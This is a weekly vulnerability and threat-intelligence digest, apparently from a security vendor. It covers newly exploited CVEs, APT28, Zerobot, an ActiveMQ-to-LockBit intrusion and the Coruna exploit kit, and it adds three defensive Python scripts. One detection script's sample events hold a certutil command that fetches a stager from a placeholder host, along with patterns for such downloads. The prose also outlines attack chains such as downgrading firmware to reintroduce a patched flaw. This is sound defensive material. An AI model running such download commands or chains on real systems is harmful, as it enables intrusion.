March 6, 2026

New KEV Additions, Active Exploits and Malware Campaigns Signal a High-Stakes Week

Executive Summary

This week's threat landscape was dominated by a wave of active exploitations and newly cataloged vulnerabilities, as CISA added two critical flaws to its KEV catalog - one affecting Broadcom VMware Aria Operations and another impacting approximately 234 Qualcomm chipsets - while Cisco Catalyst SD-WAN Manager continued to trend with two additional vulnerabilities actively exploited in the wild, signaling persistent attacker interest in network orchestration platforms.  

On the threat activity front, APT28 leveraged the Microsoft zero-day in a coordinated state-sponsored campaign, while Akamai SIRT observed Zerobot botnet operators exploiting vulnerabilities in Tenda AC1206 routers and the n8n automation platform. Additional intrusion activity involved exploitation of Apache ActiveMQ to deploy LockBit ransomware, alongside the Coruna iOS exploit kit circulating among multiple threat actors, illustrating how advanced exploit capabilities are increasingly shifting from espionage operations into broader criminal abuse.

Key points:

  • 2 vulnerabilities added to the CISA KEV catalog  
  • Active exploitation of Cisco Catalyst SD-WAN Manager vulnerabilities
  • APT28 leveraged the Microsoft zero-day in a state-sponsored campaign
  • Zerobot botnet exploiting vulnerabilities in Tenda AC1206 routers and the n8n automation platform
  • Apache ActiveMQ vulnerability exploited to deploy LockBit ransomware
  • Google identified Coruna exploit kit circulating among multiple threat actors  

What are the top trending or critical vulnerabilities observed this week?

Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.

CVE-2026-20122 - Arbitrary File Overwrite vulnerability in Cisco Catalyst SD-WAN Manager

An Arbitrary File Overwrite vulnerability in Cisco Catalyst SD-WAN Manager stems from improper file handling on the API interface, where the system fails to adequately validate file upload requests and enforce access controls based on user privilege levels. This allows an authenticated attacker with only read-only API credentials to upload malicious files and overwrite arbitrary files on the local file system, ultimately escalating privileges to vmanage user level - well beyond what their access should permit. The risk is particularly significant given that SD-WAN Manager serves as the backbone for managing corporate wide-area networks, meaning a successful exploit could give attackers broad influence over network-wide configurations and operations. Cisco's PSIRT has confirmed active exploitation of this vulnerability in the wild, underscoring the urgency for affected organizations to apply available patches and review API access controls without delay.

CVE-2026-20127 - Authentication Bypass vulnerability in Cisco Catalyst SD-WAN Controller and Manager

An Authentication Bypass vulnerability in Cisco Catalyst SD-WAN Controller and Manager could allow an unauthenticated remote attacker to bypass authentication and obtain administrative access to an affected system. The issue arises from a flawed peering authentication mechanism within Cisco Catalyst SD-WAN Controller (formerly vSmart) and Manager (formerly vManage), where crafted requests can circumvent intended access controls. Successful exploitation enables login as an internal, high-privileged, non-root administrative user, granting access to NETCONF and the ability to manipulate SD-WAN fabric configurations. The vulnerability was reportedly exploited as a zero-day, highlighting the risk of unauthorized control over enterprise network infrastructure. Cisco has addressed this issue in its official security advisory, and due to confirmed in-the-wild exploitation, the vulnerability has been added to the CISA KEV catalog, underscoring the urgency of immediate patching and access control hardening.

CVE-2026-20128 - Information Disclosure vulnerability in Cisco Catalyst SD-WAN Manager

An Information Disclosure vulnerability in the Data Collection Agent (DCA) feature of Cisco Catalyst SD-WAN Manager arises from an exposed credential file on the affected system, which stores the DCA user password in a location readable by low-privileged users. An authenticated local attacker with valid vmanage credentials can exploit this by navigating the filesystem, locating the credential file, and reading the plaintext DCA password, effectively bypassing the privilege boundaries that should separate user roles. A successful exploit allows the attacker to use the harvested credentials to access other affected systems and gain DCA user privileges across the environment, amplifying the blast radius beyond the initially compromised host. Cisco's PSIRT has confirmed active exploitation of this vulnerability, making it critical for organizations to audit filesystem permissions, restrict access to sensitive credential files, and apply Cisco's recommended patches immediately.
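The remediation step above (audit filesystem permissions on credential files) is the kind of check that can be scripted. The following is an added example written for this digest, not Cisco code: it walks a directory tree, picks out files whose names suggest stored credentials, and reports any that are readable by group or others. The directory layout, file names and modes in the fixture are constructed for illustration; the real location of the DCA credential file is not stated in the advisory summary and is not assumed here.

```python
"""Audit a tree for credential-like files readable by anyone but their owner.

Added example for this digest, not Cisco or vendor code. The sample tree built
by build_fixture() is constructed; paths and file names are placeholders.
"""
import os
import stat
import tempfile
from typing import List, Tuple

# Name fragments that commonly mark stored secrets (heuristic, not exhaustive).
CREDENTIAL_HINTS = ("password", "passwd", "credential", "secret", ".pem", ".key")


def looks_like_credential_file(name: str) -> bool:
    lowered = name.lower()
    return any(hint in lowered for hint in CREDENTIAL_HINTS)


def audit_permissions(root: str) -> List[Tuple[str, str]]:
    """Return (relative_path, octal_mode) for credential-like regular files
    whose mode grants read access to group or others."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not looks_like_credential_file(name):
                continue
            path = os.path.join(dirpath, name)
            st = os.lstat(path)  # lstat: do not follow symlinks
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_IRGRP | stat.S_IROTH):
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append((rel, oct(stat.S_IMODE(st.st_mode))))
    return sorted(findings)


def build_fixture(root: str) -> None:
    """Constructed sample tree: one world-readable password file (the expected
    finding), one owner-only secret file, and one world-readable non-credential
    file that must not be reported."""
    os.makedirs(os.path.join(root, "etc", "dca"), exist_ok=True)
    specs = {
        os.path.join("etc", "dca", "dca_password.txt"): 0o644,  # placeholder name
        os.path.join("etc", "dca", "api.secret"): 0o600,
        os.path.join("etc", "motd"): 0o644,
    }
    for rel, mode in specs.items():
        path = os.path.join(root, rel)
        with open(path, "w") as fh:
            fh.write("placeholder\n")
        os.chmod(path, mode)  # set explicitly so umask does not interfere


def demo() -> List[Tuple[str, str]]:
    """Build the fixture in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as root:
        build_fixture(root)
        return audit_permissions(root)


if __name__ == "__main__":
    for rel_path, mode in demo():
        print(f"readable by non-owner: {rel_path} (mode {mode})")
```

Run against a real appliance filesystem by calling audit_permissions() on the directory of interest; the name heuristic is deliberately broad, so review hits by hand and extend CREDENTIAL_HINTS to match the naming used on the platform.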

CVE-2026-21385 - Memory Corruption vulnerability in Qualcomm Multiple Chipsets

A Memory Corruption vulnerability rooted in improper memory allocation alignment has been identified across approximately 234 Qualcomm chipsets, spanning the latest Snapdragon 8 Elite, multiple 5G platforms, and automotive-grade components, posing a significant threat to device integrity by enabling deeper system compromise. Notably, Qualcomm has withheld key details surrounding the exploitation timeline, victim count, and activity during the 10-week gap between initial reporting and public disclosure, leaving the full scope of impact unclear. Actively exploited as a zero-day with evidence of limited, targeted attacks in the wild, the flaw has been addressed by Google in the March 2026 Android Security Bulletin and added to the CISA KEV catalog.

CVE-2026-22719 - Command Injection vulnerability in Broadcom VMware Aria Operations

A Command Injection vulnerability in Broadcom VMware Aria Operations (formerly vRealize Operations) allows an unauthenticated attacker to run arbitrary commands and potentially achieve remote code execution during support-assisted product migration, so no login credentials are needed to exploit it. The flaw affects VMware Cloud Foundation and vSphere Foundation 9.x as well as VMware Aria Operations 8.x. Broadcom has acknowledged awareness of active exploitation, although the identity of the threat actors, the attack methods, and the scale of exploitation remain undisclosed. Organizations are advised to update to VMware Cloud Foundation and vSphere Foundation 9.0.2.0 or VMware Aria Operations 8.18.6 respectively; those unable to patch immediately can apply a temporary mitigation by running the provided shell script ("aria-ops-rce-workaround.sh") as root on each affected Virtual Appliance node. This vulnerability has been added to the CISA KEV catalog, signaling that federal agencies and critical infrastructure organizations should treat remediation as a priority.

CVE-2022-20775 - Path Traversal vulnerability in Cisco SD-WAN

A Path Traversal vulnerability in Cisco SD-WAN could allow an authenticated local attacker to gain elevated privileges due to improper access controls within the application CLI, ultimately enabling arbitrary command execution as the root user. According to Cisco Talos, exploitation activity targeting Cisco Catalyst SD-WAN infrastructure has demonstrated sophisticated vulnerability chaining. In observed campaigns, threat actors first leveraged CVE-2026-20127, an authentication bypass vulnerability, to obtain administrative access to exposed controllers. The attackers then performed a software downgrade to reintroduce the previously patched CVE-2022-20775, exploited it to escalate privileges to root, and restored the original software version to evade detection while retaining full control. This multi-stage approach highlights a deliberate strategy to achieve deep persistence and unrestricted manipulation of SD-WAN network configurations. Due to the severity and confirmed exploitation patterns, this vulnerability has been added to the CISA KEV catalog, emphasizing the urgency of remediation and strict access control enforcement.
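The downgrade-then-restore sequence described above leaves a distinctive trace in software-version change records: a version goes backwards and, shortly afterwards, returns to where it was. The following is an added detection example written for this digest, not Cisco or Talos code. It assumes a simplified feed of version-change events (device, timestamp, old version, new version); the sample events and version strings are constructed and are not specific Cisco SD-WAN releases.

```python
"""Flag a software downgrade followed by a restore on the same device.

Added example for this digest, not Cisco or Talos code. The event schema is a
simplifying assumption and the sample events below are constructed.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class VersionChange:
    device: str
    ts: datetime
    old_version: str
    new_version: str


# Constructed sample events; version strings are placeholders.
SAMPLE_EVENTS = [
    # controller-01: downgrade, then restore 42 minutes later (the pattern)
    VersionChange("sdwan-controller-01", datetime(2026, 3, 2, 1, 10), "20.9.3", "20.6.1"),
    VersionChange("sdwan-controller-01", datetime(2026, 3, 2, 1, 52), "20.6.1", "20.9.3"),
    # controller-02: ordinary upgrade, not suspicious
    VersionChange("sdwan-controller-02", datetime(2026, 3, 2, 9, 0), "20.6.1", "20.9.3"),
    # manager-01: downgrade with no restore (reportable on its own)
    VersionChange("sdwan-manager-01", datetime(2026, 3, 3, 22, 30), "20.12.1", "20.9.3"),
]


def parse_version(version: str) -> Tuple[int, ...]:
    """'20.9.3' -> (20, 9, 3); non-numeric components compare as 0."""
    return tuple(int(p) if p.isdigit() else 0 for p in version.split("."))


def is_downgrade(ev: VersionChange) -> bool:
    return parse_version(ev.new_version) < parse_version(ev.old_version)


def list_downgrades(events: List[VersionChange]) -> List[VersionChange]:
    """Every downgrade is worth a ticket on a controller, restored or not."""
    return [ev for ev in events if is_downgrade(ev)]


def find_downgrade_restore(
    events: List[VersionChange], window: timedelta = timedelta(hours=24)
) -> List[Tuple[VersionChange, VersionChange]]:
    """Return (downgrade, restore) pairs: a downgrade followed within `window`
    by an upgrade back to at least the version it came from, on one device."""
    by_device: Dict[str, List[VersionChange]] = {}
    for ev in sorted(events, key=lambda e: e.ts):
        by_device.setdefault(ev.device, []).append(ev)

    pairs = []
    for evs in by_device.values():
        open_downgrades: List[VersionChange] = []
        for ev in evs:
            if is_downgrade(ev):
                open_downgrades.append(ev)
                continue
            for down in list(open_downgrades):
                restored = parse_version(ev.new_version) >= parse_version(down.old_version)
                if ev.ts - down.ts <= window and restored:
                    pairs.append((down, ev))
                    open_downgrades.remove(down)
                    break
    return pairs


if __name__ == "__main__":
    for down, up in find_downgrade_restore(SAMPLE_EVENTS):
        gap = up.ts - down.ts
        print(f"{down.device}: {down.old_version} -> {down.new_version} -> "
              f"{up.new_version} within {gap}")
```

The paired finding is the high-confidence signal; a bare downgrade on a controller is still unusual enough to review, which is why list_downgrades() is kept separate. The 24-hour window is an assumption and should be tuned to how quickly maintenance windows actually close in the environment.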

What did Cytellite sensors detect this week?

Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.

| Vulnerability | Product | Severity | Title | Exploited in the wild | CISA KEV |
|---|---|---|---|---|---|
| CVE-2025-7417 | Tenda O3V2 | High | Improper Restriction of Operations within the Bounds of a Memory Buffer in Tenda O3V2 | No | False |
| CVE-2025-7414 | Tenda O3V2 | High | OS Command Injection vulnerability in Tenda O3V2 | No | False |
| CVE-2025-64446 | Fortinet FortiWeb | Critical | Relative Path Traversal vulnerability in Fortinet FortiWeb | No | True |
| CVE-2025-5777 | Citrix NetScaler ADC and NetScaler Gateway | Critical | Out-of-Bounds Read vulnerability in Citrix NetScaler ADC and NetScaler Gateway | No | True |
| CVE-2025-54123 | Hoverfly | Critical | Command Injection vulnerability in Hoverfly API Simulation Tool | No | False |
| CVE-2025-4632 | Samsung MagicINFO 9 | Critical | Path Traversal vulnerability in Samsung MagicINFO 9 | Yes | True |
| CVE-2025-4427 | Ivanti Endpoint Manager Mobile | Medium | Authentication Bypass vulnerability in Ivanti Endpoint Manager Mobile | Yes | True |
| CVE-2025-3248 | Langflow | Critical | Missing Authentication for Critical Function vulnerability in Langflow | Yes | True |
| CVE-2025-32432 | Craft CMS | Critical | Remote Code Execution vulnerability in Craft CMS | Yes | False |
| CVE-2025-31324 | SAP NetWeaver | Critical | An Unrestricted vulnerability in the SAP NetWeaver | Yes | True |

Which vulnerabilities were abused by malware this week?

Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analysed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.

APT28 Exploits Microsoft Zero-Day CVE-2026-21513 in Coordinated State-Sponsored Campaign

According to findings from Akamai, a recently patched Microsoft vulnerability, CVE-2026-21513, has been linked to APT28, a Russia-affiliated state-sponsored threat actor, with evidence suggesting the flaw was actively exploited as a zero-day in real-world attacks before Microsoft issued a fix. The vulnerability can be weaponized by tricking a victim into opening a malicious HTML or LNK shortcut file delivered via a link or email attachment, which then manipulates browser and Windows Shell handling to execute content at the operating system level, enabling security feature bypass and potential code execution. Akamai's investigation identified a malicious artifact uploaded to VirusTotal on January 30, 2026, tied to APT28-linked infrastructure, directly connecting the threat actor to active exploitation of CVE-2026-21513. Organizations are strongly advised to apply Microsoft's latest patches without delay, review email and file-handling policies, and remain vigilant against socially engineered file-based attack vectors; the convergence of state-sponsored intent and multi-vulnerability exploitation underscores the importance of timely remediation and proactive defense.

Akamai Uncovers Zerobot Botnet Campaign Exploiting Tenda and n8n Vulnerabilities

The Akamai Security Intelligence and Response Team (SIRT) has identified active exploitation of two command injection vulnerabilities, CVE-2025-7544 and CVE-2025-68613, targeting Tenda AC1206 routers and the n8n workflow automation platform as part of an ongoing Mirai-based botnet campaign dubbed Zerobot, which dates back to at least early December 2025 and was detected across Akamai's global honeypot network in mid-January 2026. What distinguishes this campaign is its targeting of n8n, a workflow automation platform that sits well outside the typical botnet playbook of exploiting IoT devices such as routers, cameras, and DVRs, representing a deliberate expansion toward more critical and interconnected enterprise infrastructure. The campaign highlights a growing trend of botnet operators broadening their targeting scope, and organizations running either Tenda AC1206 routers or n8n instances should treat patching and network segmentation as an immediate priority.

Threat actor exploits Apache ActiveMQ twice, deploys LockBit ransomware after initial breach

According to The DFIR Report, a threat actor exploited CVE-2023-46604 on an internet-facing Apache ActiveMQ server to gain initial access, using a malicious Java Spring bean XML configuration to execute remote code and download a Metasploit stager via Windows CertUtil, marking the beginning of a multi-stage intrusion. Post-exploitation activity involved privilege escalation to SYSTEM level, LSASS memory dumping, lateral movement across the network using domain administrator credentials, and remote service execution of Metasploit payloads on multiple hosts. Despite being evicted, the threat actor returned 18 days later through the same unpatched server, rapidly reestablishing access using previously harvested credentials before deploying LockBit ransomware via RDP across backup and file servers; organizations that missed the first intrusion had less than 90 minutes to respond before ransomware execution began. The LockBit binary, believed to have been built using the leaked LockBit builder given its modified ransom note and exclusive reliance on the Session messaging service for communication, was deployed approximately 19 days after initial access, underscoring the persistent and calculated nature of the attack.
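The initial-access step above, the ActiveMQ Java service spawning CertUtil to fetch a stager, is visible in ordinary process-creation telemetry and is a tight detection opportunity well before the second visit. The following is an added example written for this digest, not code from The DFIR Report: it classifies process-creation events and escalates when the parent is an ActiveMQ Java process. The pipe-separated, Sysmon-style event format and every sample line are constructed; the URL is a placeholder.

```python
"""Flag process-creation events consistent with the ActiveMQ intrusion above.

Added example for this digest, not code from The DFIR Report. The event
format (pipe-separated key=value fields) is an assumption and all sample
events are constructed; the download URL is a placeholder.
"""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample events. None of these are real telemetry.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\certutil.exe | CommandLine=certutil.exe -urlcache -split -f http://example.invalid/stager.exe C:\Windows\Temp\svc.exe | ParentImage=C:\Program Files\ActiveMQ\jre\bin\java.exe | ParentCommandLine=java.exe -Xms64M -jar activemq.jar start | User=NT AUTHORITY\SYSTEM",
    r"Image=C:\Windows\System32\certutil.exe | CommandLine=certutil.exe -hashfile C:\Users\admin\image.iso SHA256 | ParentImage=C:\Windows\System32\cmd.exe | ParentCommandLine=cmd.exe | User=CORP\admin",
    r"Image=C:\Windows\System32\cmd.exe | CommandLine=cmd.exe /c whoami | ParentImage=C:\Program Files\ActiveMQ\jre\bin\java.exe | ParentCommandLine=java.exe -Xms64M -jar activemq.jar start | User=NT AUTHORITY\SYSTEM",
    r"Image=C:\Windows\System32\notepad.exe | CommandLine=notepad.exe notes.txt | ParentImage=C:\Windows\explorer.exe | ParentCommandLine=explorer.exe | User=CORP\alice",
    r"Image=C:\Windows\System32\certutil.exe | CommandLine=certutil.exe -urlcache -f http://example.invalid/tool.zip tool.zip | ParentImage=C:\Windows\explorer.exe | ParentCommandLine=explorer.exe | User=CORP\alice",
]

# certutil switches that fetch remote content (legitimate use is rare on a broker host).
DOWNLOAD_SWITCH = re.compile(r"-(urlcache|verifyctl)\b", re.IGNORECASE)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def parse_event(line: str) -> Dict[str, str]:
    fields = {}
    for chunk in line.split(" | "):
        key, _, value = chunk.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def spawned_by_activemq(ev: Dict[str, str]) -> bool:
    """Parent is a Java process whose command line references ActiveMQ."""
    parent = basename(ev.get("ParentImage", ""))
    return parent in ("java.exe", "javaw.exe") and "activemq" in ev.get("ParentCommandLine", "").lower()


def classify(ev: Dict[str, str]) -> Optional[Tuple[str, str]]:
    image = basename(ev.get("Image", ""))
    cmdline = ev.get("CommandLine", "")
    from_broker = spawned_by_activemq(ev)
    if image == "certutil.exe" and DOWNLOAD_SWITCH.search(cmdline):
        if from_broker:
            return ("high", "activemq_spawned_certutil_download")
        return ("medium", "certutil_download")
    if from_broker and image in SHELLS:
        return ("medium", "activemq_spawned_shell")
    return None


def detect(lines: List[str]) -> List[Dict[str, str]]:
    findings = []
    for line in lines:
        ev = parse_event(line)
        hit = classify(ev)
        if hit is not None:
            findings.append({
                "severity": hit[0],
                "reason": hit[1],
                "user": ev.get("User", ""),
                "command": ev.get("CommandLine", ""),
            })
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(f"[{finding['severity']}] {finding['reason']}: {finding['command']}")
```

The "activemq_spawned_shell" rule is the broader net: a message broker has no business launching cmd.exe or PowerShell, whatever the child does next. The same parent-process logic transfers to other Java-based server software by changing the substring matched in ParentCommandLine.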

Google identifies Coruna exploit kit targeting iOS versions 13.0 through 17.2.1

According to Google Threat Intelligence Group, the Coruna exploit kit has been weaponized by diverse threat actors, including UNC6353, a suspected Russian espionage group targeting Ukrainian websites, and UNC6691, a Chinese financially motivated cluster that deployed the PlasmaLoader payload for mass-scale cryptocurrency theft. The framework notably reuses advanced vulnerabilities such as Photon (CVE-2023-32434) and Gallium (CVE-2023-38606), which were first identified as zero-days within the sophisticated Operation Triangulation campaign. This progression highlights a dangerous market for "second-hand" exploits, where elite spyware-grade capabilities transition from targeted government reconnaissance into broad criminal exploitation.

| Vulnerability | Severity | Title | Patch | Abused By Malware | OSS |
|---|---|---|---|---|---|
| CVE-2026-21513 | High | Protection Mechanism Failure vulnerability in Microsoft MSHTML Framework | Yes | APT28 | False |
| CVE-2025-7544 | High | Stack-based Buffer Overflow vulnerability in Tenda AC1206 routers | No | Zerobot botnet | False |
| CVE-2025-68613 | Critical | Remote Code Execution vulnerability in n8n workflow automation platform | Yes | Zerobot botnet | False |
| CVE-2024-23222 | High | Type Confusion vulnerability in Apple multiple products can lead to code execution when processing maliciously crafted web content | Yes | Coruna exploit kit, PlasmaLoader, UNC6353, UNC6691 | True |
| CVE-2024-23225 | High | Memory Corruption vulnerability in Apple multiple products enables an attacker with arbitrary kernel read and write capability to bypass kernel memory protections | Yes | Coruna exploit kit, PlasmaLoader, UNC6691 | False |
| CVE-2024-23296 | High | Memory Corruption vulnerability in Apple multiple products enables an attacker with arbitrary kernel read and write capability to bypass kernel memory protections | Yes | Coruna exploit kit, PlasmaLoader, UNC6691 | False |
| CVE-2023-32409 | High | Sandbox Escape vulnerability in Apple multiple products enables a remote attacker to break out of the Web Content sandbox | Yes | Coruna exploit kit, PlasmaLoader, UNC6691 | False |
| CVE-2023-32434 | High | Integer Overflow vulnerability in Apple multiple products that enables an application to execute code with kernel privileges | Yes | Coruna exploit kit, PlasmaLoader, UNC6691, Operation Triangulation | False |
| CVE-2023-38606 | Medium | Unspecified vulnerability in Apple multiple products that allows an app to modify sensitive kernel state | Yes | Coruna exploit kit, PlasmaLoader, UNC6691, Operation Triangulation | False |
| CVE-2023-41974 | High | Use-After-Free vulnerability in Apple iOS and iPadOS | Yes | Coruna exploit kit, PlasmaLoader, UNC6691 | False |
| CVE-2023-43000 | High | Use-After-Free vulnerability in Apple multiple products that may lead to memory corruption | Yes | Coruna exploit kit, PlasmaLoader, UNC6353, UNC6691 | False |
| CVE-2023-46604 | Critical | Deserialization of Untrusted Data vulnerability in Apache ActiveMQ | Yes | LockBit Ransomware | True |
| CVE-2022-48503 | High | Unspecified vulnerability in Apple multiple products in JavaScriptCore when processing web content may lead to arbitrary code execution | Yes | Coruna exploit kit, PlasmaLoader, UNC6353, UNC6691 | True |
| CVE-2021-30952 | High | Integer Overflow or Wraparound vulnerability in Apple multiple products due to the processing of maliciously crafted web content that may lead to arbitrary code execution | Yes | Coruna exploit kit, PlasmaLoader, UNC6691 | True |
| CVE-2020-27932 | High | Type Confusion vulnerability in Apple multiple products that may allow a malicious application to execute code with kernel privileges | Yes | Coruna exploit kit, PlasmaLoader, UNC6691 | False |
| CVE-2020-27950 | Medium | Memory Initialization vulnerability in Apple multiple products that may allow a malicious application to disclose kernel memory | Yes | Coruna exploit kit, PlasmaLoader, UNC6691 | False |

What were the most trending OSS vulnerabilities this week?

Open-Source Software (OSS) vulnerabilities are security weaknesses discovered in publicly available codebases that can be exploited across widely used libraries, frameworks, and tools, often impacting thousands of downstream applications.

| CVE-ID | Title | Ecosystem |
|---|---|---|
| CVE-2026-2970 | Unsafe Deserialization in datapizza-ai | PyPI |
| CVE-2026-25747 | Deserialization of Untrusted Data vulnerability in Apache Camel | Maven |
| CVE-2026-27626 | OS Command Injection vulnerability in OliveTin | Go |
| CVE-2026-27799 | Heap buffer over-read vulnerability in DJVU image format handler of ImageMagick | NuGet |
| CVE-2025-68613 | Remote Code Execution in n8n | npm |

Were any PRE-NVD vulnerabilities identified this week?

PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.

| CVE-ID | Type of vulnerability | Product | Reference |
|---|---|---|---|
| CVE-2026-2491 | Authentication Bypass | Socomec DIRIS A-40 | Resource |
| CVE-2026-28501 | Unauthenticated SQL Injection | AVideo | Resource |
| CVE-2026-28795 | Path Traversal | OpenChatBI | Resource |
| CVE-2026-29062 | Denial of Service (DoS) | FasterXML Jackson (Maven) | Resource |
| CVE-2025-71214 | Local Privilege Escalation | Trend Micro Apex One Security Agent iCore Service | Resource |

Conclusion

The week's developments reinforce a hard truth: modern attacks rarely rely on a single flaw; they thrive on chaining vulnerabilities across infrastructure, applications, and devices to maximize operational impact. From KEV additions affecting VMware and Qualcomm platforms to active exploitation involving Zerobot botnet activity and advanced exploit frameworks like Coruna, adversaries continue to blend multiple weaknesses into coordinated attack paths. These patterns highlight the limits of reactive patching and the growing need for intelligence-driven vulnerability prioritization. Loginsoft Vulnerability Intelligence (LOVI) helps security teams track exploited vulnerabilities, emerging threat activity, and sector-relevant risks in real time, enabling faster remediation and stronger defensive readiness.

FAQs

1) What is Cisco Catalyst SD-WAN and what does it do?

Cisco Catalyst SD-WAN is a software-defined wide area networking (SD-WAN) solution designed to securely connect enterprise branch offices, data centers, cloud environments, and remote users over distributed networks. It centralizes network management and control through controllers (formerly vSmart and vManage), enabling organizations to optimize traffic routing, enforce security policies, and improve application performance across multiple locations.

2) Does inclusion in the CISA KEV catalog mean exploitation is widespread?

Not necessarily widespread - but confirmed. KEV inclusion indicates verified in-the-wild exploitation. While the scale may vary, the operational reality is that threat actors possess working exploits, making patch prioritization urgent regardless of observed targeting volume.

3) How does LOVI help organizations manage vulnerabilities effectively?

Loginsoft Vulnerability Intelligence empowers you to efficiently prioritize and respond to potential vulnerabilities by focusing on those actively exploited in the wild. LOVI correlates vulnerability data with real-world threat activity to reduce noise and improve decision-making. This approach enables faster remediation and stronger security posture.

4) What is Cytellite?

Cytellite is a Loginsoft security intelligence platform that provides real-time visibility into emerging threats through a global sensor network. It delivers actionable IP intelligence to help organizations detect, analyze, and respond to attacks quickly. By correlating threat data with live activity, Cytellite strengthens resilience across dynamic threat landscapes.
